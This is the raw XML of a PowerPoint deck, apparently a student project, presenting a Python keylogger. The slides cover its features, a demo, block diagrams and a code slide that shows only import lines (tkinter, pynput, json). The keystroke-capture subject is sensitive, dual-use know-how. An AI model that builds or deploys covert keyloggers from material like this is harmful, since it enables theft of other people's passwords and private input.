
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="bin" ContentType="image/unknown"/>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media/image5.jpg" ContentType="image/jpg"/>
  <Override PartName="/ppt/media/image10.jpg" ContentType="image/jpg"/>
  <Override PartName="/ppt/media/image11.jpg" ContentType="image/jpg"/>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22" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId20"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="276" r:id="rId3"/>
    <p:sldId id="277" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="268" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="269" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="270" r:id="rId12"/>
    <p:sldId id="271" r:id="rId13"/>
    <p:sldId id="273" r:id="rId14"/>
    <p:sldId id="278" r:id="rId15"/>
    <p:sldId id="265" r:id="rId16"/>
    <p:sldId id="274" r:id="rId17"/>
    <p:sldId id="279" r:id="rId18"/>
    <p:sldId id="275" r:id="rId19"/>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4ED0F802-ADF2-42F8-BF91-73DAE5C61C84}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>13-06-2024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6836D823-EF93-4EE3-B656-469833966D82}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2275639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836D823-EF93-4EE3-B656-469833966D82}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6404546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1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/13/2024</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38290823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93709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768870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41053888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778561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6/13/2024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7280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1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/13/2024</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1060"/>
            <a:ext cx="2112264" cy="228600"/>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1948763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6/13/2024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33404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6/13/2024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82121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6/13/2024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96674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6/13/2024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3569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t>6/13/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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pPr marL="38100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="55"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-IN" spc="10" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" spc="10"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26558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1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/13/2024</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IN"/>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pPr marL="38100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="55"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-IN" spc="10" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" spc="10"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72458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1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/13/2024</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75943183"/>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RojaKoppakula/IBM_C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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.bin"/><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133599" y="986309"/>
            <a:ext cx="1743075" cy="1333500"/>
            <a:chOff x="742950" y="1104900"/>
            <a:chExt cx="1743075" cy="1333500"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>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grp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grpFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505200" y="1696755"/>
            <a:ext cx="2867026" cy="2143124"/>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1543050" y="1995959"/>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chemeClr val="accent5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2767011" y="3174059"/>
            <a:ext cx="9296400" cy="847668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3213735">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" spc="15" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Rojamani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" spc="15" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" spc="15" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Koppaula</a:t>
            </a:r>
            <a:endParaRPr sz="5400" spc="15" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>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object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8846820" y="4124115"/>
            <a:ext cx="2354580" cy="382156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D936B"/>
                </a:solidFill>
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>KEY LOGGER</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCCA455C-2D4B-451C-9B25-2D8A0D35309D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395287" y="2768317"/>
            <a:ext cx="3743325" cy="3190876"/>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chemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2FDD6DC-9E17-4E7E-BEA4-E6E571B57EE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4419600" y="4230046"/>
            <a:ext cx="1743075" cy="1333500"/>
            <a:chOff x="742950" y="1104900"/>
            <a:chExt cx="1743075" cy="1333500"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05CBBCE8-840C-458F-A676-381EE455C611}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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grpFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20405A91-1B3C-4A4A-8CBF-EE22D3535902}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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grpFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADBEA6E5-B156-4F34-A95B-EE7D6505C5E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3829051" y="5239696"/>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chemeClr val="accent5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>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77362" y="200681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55332" y="385444"/>
            <a:ext cx="10681335" cy="570669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>THE WOW IN THE SOLUTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C055EFD-16FB-B0CB-6069-4F9A665FB300}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2478704" y="1228505"/>
            <a:ext cx="9048750" cy="5109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Highlighting the unique features and benefits of our key logger.</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Unique Features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Logging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Instantly logs and displays keystrokes.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Customizable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Options to customize the logging format and frequency.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Lightweight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Minimal impact on system resources.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Secure Logging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is logged securely, with options for encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:tabLst/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"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Demonstration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Live Demo</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Showing the key logger in action, logging keystrokes in real-time.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Experience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Demonstrating the ease of use and intuitive interface.</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3DB53D6-783A-755A-8804-71CB1CC5F8F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="914400"/>
            <a:ext cx="10744200" cy="1692771"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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Feedback</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Testimonials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Positive feedback from beta users and early adopters.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Performance Metrics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Statistics on efficiency and reliability from testing.</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3339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31C5F-EBE2-28DD-FD0D-EC018423E39F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755332" y="385444"/>
            <a:ext cx="10681335" cy="553998"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MODELING</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" b="1" dirty="0">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EEB26FFF-554D-ACAA-BC01-A94C4D12C8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0999" y="1266320"/>
            <a:ext cx="3859857" cy="3557806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFDB56EC-9F94-F75E-10A0-DAFC9324270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31355" y="1266320"/>
            <a:ext cx="3685604" cy="3587623"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2CE6E0B-E804-3CC4-D9DF-7D5C1EF5EEDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329727" y="5029200"/>
            <a:ext cx="3962400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Block diagram of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>orking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2A7BB49-D2D6-DEEF-2CA3-9CC70B81AD2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4764236" y="5010632"/>
            <a:ext cx="3019842" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Keylogger</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6B49EA0-A2FE-FB38-59F8-B0493DB0FF9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07457" y="1236503"/>
            <a:ext cx="3467100" cy="3587623"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CF19D06-A1FF-248B-E17D-A0DE7609E6C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8541067" y="5029200"/>
            <a:ext cx="2895600" cy="477798"/>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b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hardware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Based Keylogger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1870918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94248-EFAD-E46B-63FC-5DCBCFFA6327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="-9525"/>
            <a:ext cx="10058400" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CODE SNIPPET</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3200" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B99C02B1-625E-1BA4-86CD-D194913757F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1067118"/>
            <a:ext cx="12344400" cy="5257482"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="2"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tk</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
